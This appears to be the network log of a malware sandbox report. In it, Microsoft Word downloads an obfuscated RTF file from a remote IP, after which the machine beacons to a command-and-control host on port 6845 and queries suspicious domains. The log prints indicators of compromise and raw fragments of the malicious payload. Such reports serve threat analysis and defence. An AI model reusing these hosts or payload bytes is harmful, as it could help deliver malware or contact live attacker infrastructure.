                                                                                                                        Sep 30, 2024 15:00:29.188858032 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.188858032 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.188868999 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.188880920 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.188880920 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.188894033 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.188904047 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.188930035 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189240932 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189251900 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189261913 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189280987 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189440012 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189450979 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189460993 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189471006 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189479113 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189482927 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189502001 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189503908 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189512968 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189524889 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189534903 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189538956 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189546108 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189557076 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189567089 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189567089 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189579010 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189589024 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189590931 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189603090 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189604998 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189615011 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189625978 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189636946 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189641953 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189650059 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189659119 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189661026 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189671993 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189682961 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189685106 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189692974 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.189716101 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.189909935 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190099001 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190109968 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190119982 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190130949 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190140963 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190141916 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190154076 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190164089 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190165997 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190177917 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190187931 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190190077 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190201998 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190212965 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190236092 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190262079 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190273046 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190282106 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190294981 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190304995 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190316916 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190325975 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190336943 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190347910 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190356970 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190359116 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190368891 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190371037 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190382957 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190393925 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190396070 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190404892 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190416098 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:29.190418959 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.190429926 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:29.211258888 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.782533884 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.787604094 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.787693024 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.787869930 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.787916899 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.792654991 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.792670965 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.792684078 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.792735100 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.792735100 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.792763948 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.792817116 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.797629118 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.797646999 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.797658920 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.797668934 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.797688961 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.802287102 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802299023 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802306890 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802316904 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802558899 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:34.802587986 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802598000 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.802608967 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.807703018 CEST68454917545.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:34.807785034 CEST491756845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:54.456593990 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:54.458802938 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:00:54.463624001 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:01:24.656481981 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:01:24.658497095 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:01:24.663347960 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:01:33.291263103 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:33.603076935 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:34.214932919 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:35.412512064 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:37.814918041 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:42.713330984 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:52.416568041 CEST4917680192.168.2.22178.237.33.50
                                                                                                                        Sep 30, 2024 15:01:54.732696056 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:01:54.734754086 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:01:54.739554882 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:01:57.569040060 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:02:25.123747110 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:02:25.127116919 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:02:25.132014036 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:02:55.345544100 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:02:55.348501921 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:02:55.354398966 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:03:25.768405914 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:03:25.770478010 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:03:25.775341988 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:03:55.929563999 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:03:55.931080103 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:03:55.935982943 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:04:26.132695913 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        Sep 30, 2024 15:04:26.133487940 CEST491746845192.168.2.2245.90.89.98
                                                                                                                        Sep 30, 2024 15:04:26.138288975 CEST68454917445.90.89.98192.168.2.22
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Sep 30, 2024 14:59:59.612186909 CEST5456253192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 14:59:59.623960972 CEST53545628.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.401710033 CEST5291753192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:01.439076900 CEST53529178.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:01.440762997 CEST6275153192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:01.447797060 CEST53627518.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.245450974 CEST5789353192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:06.263061047 CEST53578938.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:06.264270067 CEST5482153192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:06.277354956 CEST53548218.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.755115986 CEST5471953192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:07.762456894 CEST53547198.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:07.763876915 CEST4988153192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:07.770905018 CEST53498818.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:20.179615021 CEST5499853192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:20.920357943 CEST53549988.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:25.618931055 CEST5278153192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:25.651633978 CEST53527818.8.8.8192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:27.189752102 CEST6392653192.168.2.228.8.8.8
                                                                                                                        Sep 30, 2024 15:00:27.200253963 CEST53639268.8.8.8192.168.2.22
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Sep 30, 2024 14:59:59.612186909 CEST192.168.2.228.8.8.80x7c8Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.401710033 CEST192.168.2.228.8.8.80x10aeStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.440762997 CEST192.168.2.228.8.8.80x1e06Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.245450974 CEST192.168.2.228.8.8.80x1100Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.264270067 CEST192.168.2.228.8.8.80x2664Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.755115986 CEST192.168.2.228.8.8.80xb6ecStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.763876915 CEST192.168.2.228.8.8.80xd97eStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:20.179615021 CEST192.168.2.228.8.8.80xa82cStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:25.618931055 CEST192.168.2.228.8.8.80xbbf0Standard query (0)maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proA (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:27.189752102 CEST192.168.2.228.8.8.80xea54Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Sep 30, 2024 14:59:59.623960972 CEST8.8.8.8192.168.2.220x7c8No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 14:59:59.623960972 CEST8.8.8.8192.168.2.220x7c8No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.439076900 CEST8.8.8.8192.168.2.220x10aeNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.439076900 CEST8.8.8.8192.168.2.220x10aeNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.447797060 CEST8.8.8.8192.168.2.220x1e06No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:01.447797060 CEST8.8.8.8192.168.2.220x1e06No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.263061047 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.263061047 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.277354956 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:06.277354956 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.762456894 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.762456894 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.770905018 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:07.770905018 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:20.920357943 CEST8.8.8.8192.168.2.220xa82cNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:20.920357943 CEST8.8.8.8192.168.2.220xa82cNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:20.920357943 CEST8.8.8.8192.168.2.220xa82cNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:20.920357943 CEST8.8.8.8192.168.2.220xa82cNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:25.651633978 CEST8.8.8.8192.168.2.220xbbf0No error (0)maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro45.90.89.98A (IP address)IN (0x0001)false
                                                                                                                        Sep 30, 2024 15:00:27.200253963 CEST8.8.8.8192.168.2.220xea54No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                        • og1.in
                                                                                                                        • raw.githubusercontent.com
                                                                                                                        • 91.134.96.177
                                                                                                                        • geoplugin.net
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.224916991.134.96.177803364C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Sep 30, 2024 15:00:11.942183018 CEST497OUTGET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                        UA-CPU: AMD64
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Host: 91.134.96.177
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Sep 30, 2024 15:00:12.537955046 CEST1236INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:12 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
                                                                                                                        ETag: "1c3d2-62350879de951"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 115666
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/msword
                                                                                                                        Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 32 6e 54 55 59 51 47 4b 5a 30 79 38 64 63 76 44 70 73 6e 70 58 54 38 69 56 75 78 34 46 59 6d 65 58 70 6f 42 47 70 4e 79 61 31 66 71 37 47 63 44 65 36 42 58 71 46 6c 77 51 4e 76 34 54 38 48 4a 77 4e 70 36 5a 6a 47 62 77 4a 6c 62 6a 6e 75 63 52 62 77 4d 33 58 37 48 46 4f 55 57 64 37 72 32 50 7a 76 31 37 39 6f 55 6c 51 66 42 38 45 6a 6a 4e 77 55 35 71 4d 34 31 37 55 34 42 51 57 50 37 36 42 57 6a 59 39 76 75 44 73 6d 4d 78 63 79 71 63 64 44 54 71 6c 5a 52 43 42 35 70 53 4f 6f 6f 42 55 30 30 59 6a 56 39 54 44 57 76 73 79 58 43 4a 43 59 4b 6a 6d 55 6f 66 31 75 47 7d 0d 0d 7b 5c 31 37 34 38 35 31 31 31 35 39 31 5b 32 32 35 31 2b 29 3b 35 2f 21 40 2a 3a 34 5f 5b 3f 39 60 39 b5 27 7c 3e 21 39 3c 21 5e 33 25 2b 5e 7c 7e 25 2a 3f 2b 32 3c 37 25 3a b0 60 3f 5d 31 7c 3f 3d 2c 38 25 a7 7e 23 2f 3a 25 3f 3c 3c 21 7c 24 36 25 2b 3f 39 25 21 32 3f b0 25 3d 5f 5d 31 31 27 27 39 3f 33 37 25 38 7e 37 3f 24 2f 2c 23 b5 26 2b 32 3a 2f 29 5f a7 27 3b 2d 5d 7c 3f 3d 21 2a 29 3f 2a 28 5d [TRUNCATED]
                                                                                                                        Data Ascii: {\rtf1{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}{\17485111591[2251+);5/!@*:4_[?9`9'|>!9<!^3%+^|~%*?+2<7%:`?]1|?=,8%~#/:%?<<!|$6%+?9%!2?%=_]11''9?37%8~7?$/,#&+2:/)_';-]|?=!*)?*(]&44`1*8?:@<_$,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|)&%6;?@/~/?=,?313$!~94#3[[~4_(?]:@~[`%##>!!`7$!+#&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~?<82:[<%?%?/._2;[/?7?*40,^.!?(@]%4^!:~%-@(4'58!3:)(+=?-24?^?;?=?`_[*$;^_;;8#.7='6:_**/56-;=%]58^,#<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=/077<.3##(**7??)1=31'%5*54~]`[0%&<$]?0;%2,)%:6$`[+&2?%2[~7]]?_9$$8?]??_[5%)$05?.6%3|6.3?|@~-::=<?;%|50;0^?29[??_?_:#!(%9[*'@51/2`?~!+/*.!-]?)^`??])=&#'*@6?,[=/~?@?^?279;5=&'??'`|@;
                                                                                                                        Sep 30, 2024 15:00:12.538028955 CEST1236INData Raw: 32 5b 31 5e 34 2a 7c 30 5d 5b 37 60 33 25 24 3f 2e a7 37 28 30 3c 5d 5e a7 38 21 31 38 26 5b 3b 2c 7e 32 34 33 2d 3a 34 39 21 27 23 21 b5 25 30 40 28 2b b0 38 2e 3b 32 60 3f 3f 29 3f 3e 30 32 23 2a 36 25 3f 26 3f 2c 40 5e 2d 37 5d 29 39 26 2e 3e
                                                                                                                        Data Ascii: 2[1^4*|0][7`3%$?.7(0<]^8!18&[;,~243-:49!'#!%0@(+8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[0;4|04?$~+|43/?_;(@-*^^<5+3;>]%8*]81_-[?=0;&*@<,#.0$,`-^6`;[#?%#_`.'$?&(??064?%6),2$#(*%-2/.`?:?+?[>^31]~>2=+%-?^`~.'2;5&)~05*.4^75]??8<?^*-4&[[~
                                                                                                                        Sep 30, 2024 15:00:12.538042068 CEST1236INData Raw: 31 24 2d a7 39 3c 23 37 35 38 34 38 24 b0 3f 5e 38 37 36 3f 27 39 3f 60 36 5f 25 5b 3f 34 39 60 7e 3d 7e 3f 3d 28 2b 3f 37 37 28 27 2f 60 60 2a 3f 36 5d 3a 3a 3f 3f 2d 27 b0 40 38 5d 3f 39 38 35 3b 3d b5 23 34 5b 3f 31 5e 39 60 21 3e 40 21 5e 7c
                                                                                                                        Data Ascii: 1$-9<#75848$?^876?'9?`6_%[?49`~=~?=(+?77('/``*?6]::??-'@8]?985;=#4[?1^9`!>@!^|61!?6$+??4?`*?7(7].?$/-[?[?-1=%@#`:_~5@[&~?2?(~'9@#~:;1<~]?3,,?6*740>+?1@`>17&!&5*:3-?%34=@!&-328=1;35@%?2?4?@7~].3>5_'#6<2^^:&1?_8_%:.-.[<`,/:~`(@40]?`
                                                                                                                        Sep 30, 2024 15:00:12.538053989 CEST672INData Raw: 33 3f 3f 21 2e 3b 37 31 40 23 30 26 23 40 33 3f 7e 3e b0 26 60 2b 34 3b 31 3c 2c 38 5b 38 32 5b 21 36 b0 3f 3f 3b 7e 25 26 28 39 21 5d 27 5f 2d 33 25 3a 5d 2f 3c 2a 3c 3b 5d b0 5f 29 2f 25 3b 23 25 26 25 37 38 26 3f 23 26 40 a7 5e 36 7e 23 28 32
                                                                                                                        Data Ascii: 3??!.;71@#0&#@3?~>&`+4;1<,8[82[!6??;~%&(9!]'_-3%:]/<*<;]_)/%;#%&%78&?#&@^6~#(22~)<9!6+3?_1$5><-@.*?(?#)!]?]6?4:-+$%?,_;4>?&?:30%@'139&|,58+%?*)';~:;07?|,6-#~=80*.*<:`,8[$[&57?)-%./,&4~<-![6?5`*,#6,#:?:#9%>`?2%?!4',(`5*##[%5%|4(|~
                                                                                                                        Sep 30, 2024 15:00:12.538067102 CEST1236INData Raw: 23 2d b0 5b 3f 36 5d 3c 3f 30 25 b0 23 32 24 2e 25 3a 60 2e 21 a7 24 3f 25 32 5d 3c 3a 3e 30 3f b0 2e 3e 36 5d a7 32 31 33 29 5f 31 35 29 7e 40 25 2f 25 5b 40 2f 26 3c 37 a7 26 39 7c 5e 3e 7e 3f 25 31 25 3f 7e 3f 33 39 2e 25 25 36 3d 38 3f 3f 3c
                                                                                                                        Data Ascii: #-[?6]<?0%#2$.%:`.!$?%2]<:>0?.>6]213)_15)~@%/%[@/&<7&9|^>~?%1%?~?39.%%6=8??<8-.$.-8?4#$894>9%,'.|%0[+]_!?~2_%]?74$(*0|'4<'/4$$3@)??2?0$[0&175?'6~?3|5*?),@6?'>7*:-*98;-!]%1/`6*.-??8=*7-54?24%![-|^>_?3/.[8!93|<!]3>-991?':%25,2$=;
